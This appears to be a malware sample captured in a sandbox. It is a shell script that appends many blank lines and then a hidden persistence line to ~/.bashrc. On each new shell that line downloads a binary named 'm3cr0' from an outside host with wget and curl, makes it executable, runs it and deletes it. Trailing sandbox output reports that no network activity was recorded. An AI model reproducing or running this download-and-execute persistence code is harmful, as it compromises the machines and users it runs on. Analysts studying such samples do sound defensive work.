echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo "cd /tmp; wget -q http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0; curl -s http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0; chmod +x m3cr0; ./m3cr0; rm -rf m3cr0; rm -rf m3cr0.1; cd ~" >> ~/.bashrc
```
No hosts contacted.
No domains contacted.
No TCP connections recorded.
No UDP connections recorded.
No HTTP(s) requests performed.
No SMTP traffic performed.
No IRC requests performed.
No ICMP traffic performed.
No CIF Results
No Suricata Alerts
No Suricata TLS
No Suricata HTTP